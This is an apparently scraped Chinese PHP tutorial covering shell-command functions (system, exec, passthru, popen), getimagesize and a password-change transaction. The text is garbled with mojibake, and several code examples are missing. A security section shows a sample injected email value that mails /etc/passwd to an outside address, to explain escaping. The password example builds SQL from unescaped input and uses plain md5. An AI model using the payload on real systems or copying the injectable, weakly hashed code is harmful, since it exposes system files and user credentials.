摘要:一執(zhí)行系統(tǒng)外部命令輸出并返回最后一行結(jié)果����。相同點都可以獲得命令執(zhí)行的狀態(tài)碼用提供的專門函數(shù)提供共了個專門的執(zhí)行外部命令的函數(shù),�,。第二個參數(shù)是可選的,用來得到命令執(zhí)行后的狀態(tài)碼����。
php高級語法總結(jié)。
一���、執(zhí)行系統(tǒng)外部命令
system() 輸出并返回最后一行shell結(jié)果���。
exec() 不輸出結(jié)果,返回最后一行shell結(jié)果�,所有結(jié)果可以保存到一個返回的數(shù)組里面。
passthru() 只調(diào)用命令�����,把命令的運行結(jié)果原樣地直接輸出到標(biāo)準(zhǔn)輸出設(shè)備上�。
相同點:都可以獲得命令執(zhí)行的狀態(tài)碼
1)用PHP提供的專門函數(shù)
PHP提供共了3個專門的執(zhí)行外部命令的函數(shù):system(),exec()�,passthru()。
system()
原型:string system (string command [, int return_var])
system()函數(shù)很其它語言中的差不多��,它執(zhí)行給定的命令��,輸出和返回結(jié)果��。第二個參數(shù)是可選的,用來得到命令執(zhí)行后的狀態(tài)碼����。
例子:
復(fù)制代碼 代碼如下:
exec()
原型:string exec (string command [, string array [, int return_var]])
exec ()函數(shù)與system()類似,也執(zhí)行給定的命令��,但不輸出結(jié)果�����,而是返回結(jié)果的最后一行���。雖然它只返回命令結(jié)果的最后一行,但用第二個參數(shù)array 可以得到完整的結(jié)果���,方法是把結(jié)果逐行追加到array的結(jié)尾處�����。所以如果array不是空的���,在調(diào)用之前最好用unset()最它清掉。只有指定了第二 個參數(shù)時�,才可以用第三個參數(shù)����,用來取得命令執(zhí)行的狀態(tài)碼��。
我們可以exec()這個方法獲取服務(wù)器端的IP
// 注意:ipconfig是Windows下的查看命令�,而Linux為ifconfig命令
exec("ifconfig -a", $arr);
print_r($arr);
passthru()
原型:void passthru (string command [, int return_var])
passthru ()只調(diào)用命令,不返回任何結(jié)果��,但把命令的運行結(jié)果原樣地直接輸出到標(biāo)準(zhǔn)輸出設(shè)備上��。所以passthru()函數(shù)經(jīng)常用來調(diào)用象pbmplus (Unix下的一個處理圖片的工具����,輸出二進(jìn)制的原始圖片的流)這樣的程序。同樣它也可以得到命令執(zhí)行的狀態(tài)碼�����。
例子:
復(fù)制代碼 代碼如下:
2) 用popen()函數(shù)打開進(jìn)程
上面的方法只能簡單地執(zhí)行命令��,卻不能與命令交互�����。但有些時候必須向命令輸入一些東西��,如在增加Linux的系統(tǒng)用戶時,要調(diào)用su來把當(dāng)前用戶換到root才行�,而su命令必須要在命令行上輸入root的密碼。這種情況下���,用上面提到的方法顯然是不行的��。
popen ()函數(shù)打開一個進(jìn)程管道來執(zhí)行給定的命令���,返回一個文件句柄。既然返回的是一個文件句柄�,那么就可以對它讀和寫了。在PHP3中���,對這種句柄只能做單一 的操作模式��,要么寫,要么讀�;從PHP4開始,可以同時讀和寫了�����。除非這個句柄是以一種模式(讀或?qū)懀┐蜷_的��,否則必須調(diào)用pclose()函數(shù)來關(guān)閉 它。
例子1:
復(fù)制代碼 代碼如下:
示例2:
3)系統(tǒng)命令實際項目中應(yīng)用示例
//查找到php安裝位置
$phpcmd = exec("which php");
print_r($phpcmd);
// 輸出結(jié)果 /usr/bin/php
$arr = array();
$ret = exec("/bin/ls -l", $arr);
print_r($ret);
print_r($arr);
4)使用外部命令需要注意的安全性
比如�,你有一家小型的網(wǎng)上商店,所以可以出售的產(chǎn)品列表放在一個文件中����。你編寫了一個有表單的HTML文件,讓你的用戶輸入他們的EMAIL地 址�����,然后把這個產(chǎn)品列表發(fā)給他們��。假設(shè)你沒有使用PHP的mail()函數(shù)(或者從未聽說過)�����,你就調(diào)用Linux/Unix系統(tǒng)的mail程序來發(fā)送這 個文件����。程序就象這樣:
復(fù)制代碼 代碼如下:
用這段代碼�����,一般的用戶不會產(chǎn)生什么危險����,但實際上存在著非常大的安全漏洞�。如果有個惡意的用戶輸入了這樣一個EMAIL地址:
"--bla ; mail [email protected] < /etc/passwd ;"
那么這條命令最終變成:
"mail --bla ; mail [email protected] < /etc/passwd ; < products.txt"
我相信,無論哪個網(wǎng)絡(luò)管理人員見到這樣的命令�,都會嚇出一身冷汗來。
幸 好����,PHP為我們提供了兩個函數(shù):EscapeShellCmd()和EscapeShellArg()。函數(shù)EscapeShellCmd把一個字符串 中所有可能瞞過Shell而去執(zhí)行另外一個命令的字符轉(zhuǎn)義�����。這些字符在Shell中是有特殊含義的����,象分號()�,重定向(>)和從文件讀入 (<)等。函數(shù)EscapeShellArg是用來處理命令的參數(shù)的���。它在給定的字符串兩邊加上單引號�,并把字符串中的單引號轉(zhuǎn)義,這樣這個字符串 就可以安全地作為命令的參數(shù)����。
再來看看超時問題。如果要執(zhí)行的命令要花費很長的時間��,那么應(yīng)該把這個命令放到系統(tǒng)的后臺去運 行�����。但在默認(rèn)情況下�,象system()等函數(shù)要等到這個命令運行完才返回(實際上是要等命令的輸出結(jié)果),這肯定會引起PHP腳本的超時��。解決的辦法是 把命令的輸出重定向到另外一個文件或流中��,如:
復(fù)制代碼 代碼如下:
/tmp/null &");
?>
5)����、高級命令實際項目中應(yīng)用:
自己實現(xiàn)異步執(zhí)行任務(wù)的隊列(二)
do_queue.php部分代碼:
$phpcmd = exec("which php"); //查找到php安裝位置
$cqueue = new Queue();
$tasks = $cqueue->getQueueTask(200);
foreach ($tasks as $t)
{
$taskphp = $t["taskphp"];
$param = $t["param"];
$job = $phpcmd . " " . escapeshellarg($taskphp) . " " . escapeshellarg($param);
system($job);
}
二、圖片處理
1) 取得圖像大小
array getimagesize ( string $filename [, array &$imageinfo ] )
getimagesize() 函數(shù)將測定任何 GIF����,JPG�����,PNG�����,SWF���,SWC,PSD�����,TIFF����,BMP,IFF����,JP2,JPX�,JB2�����,JPC,XBM 或 WBMP 圖像文件的大小并返回圖像的尺寸以及文件類型和一個可以用于普通 HTML 文件中 IMG 標(biāo)記中的 height/width 文本字符串�����。
如果不能訪問 filename 指定的圖像或者其不是有效的圖像�����,getimagesize() 將返回 FALSE 并產(chǎn)生一條 E_WARNING 級的錯誤����。
getimagesize()官方文檔說明。
示例���,獲取圖片大?��。?/p>
$url = "http://img2.fengniao.com/product/157/367/ce0Ar9cBeSl2A.jpg";
$ret = getimagesize($url);
var_dump($ret);
打印結(jié)果:
Array
(
[0] => 2100
[1] => 1280
[2] => 2
[3] => width="2100" height="1280"
[bits] => 8
[channels] => 3
[mime] => image/jpeg
)
三、事務(wù)處理
//用戶修改密碼
public function modfy_password($user_password_old, $user_password_confirm, $user_name)
{
$state = 0;
if($user_password_old && $user_password_confirm && $user_name)
{
$password_old = strval(md5($user_password_old));
$password_confirm = strval(md5($user_password_confirm));
$user_id = $GLOBALS["db"]->getOne("select user_id from admin_user where user_name="$user_name" and password="$password_old"");
if($user_id)
{
/*
$state = $GLOBALS["db"]->query("update admin_user set password="$password_confirm" where user_id=$user_id");
if($state == true)
{
// 這里需要做回滾��,如果ldap密碼更新失敗����,則上邊的操作也不允許密碼修改����?���!?0170726】
$ret = $this->modify_ldap_pwd($user_name, $user_password_old, $user_password_confirm);
$state = 1; //用戶密碼修改成功
}
*/
// 添加事物處理
try {
// 開啟事物
$GLOBALS["db"]->beginTransaction();
// 更新管理平臺密碼
$state = $GLOBALS["db"]->query("update admin_user set password="$password_confirm" where user_id=$user_id");
if($state != true)
{
throw new Exception ("更新管理平臺密碼失敗����!");
}
$ret = $this->modify_ldap_pwd($user_name, $user_password_old, $user_password_confirm);
if(!$ret)
{
throw new Exception ("更新LDAP密碼失敗��!");
}
// 提交事物
$GLOBALS["db"]->commit();
$state = 1;
}
catch (Exception $e)
{
// 回滾
$GLOBALS["db"]->rollBack();
}
}
else
{
$state = -1; //用戶的原始密碼不正確
}
}
return $state;
}
相關(guān)文章:
PHP 執(zhí)行系統(tǒng)外部命令 system() exec() passthru()
PHP中exec與system用法區(qū)別
文章版權(quán)歸作者所有�����,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為���,您可以聯(lián)系管理員刪除�����。
轉(zhuǎn)載請注明本文地址:http://systransis.cn/yun/22372.html
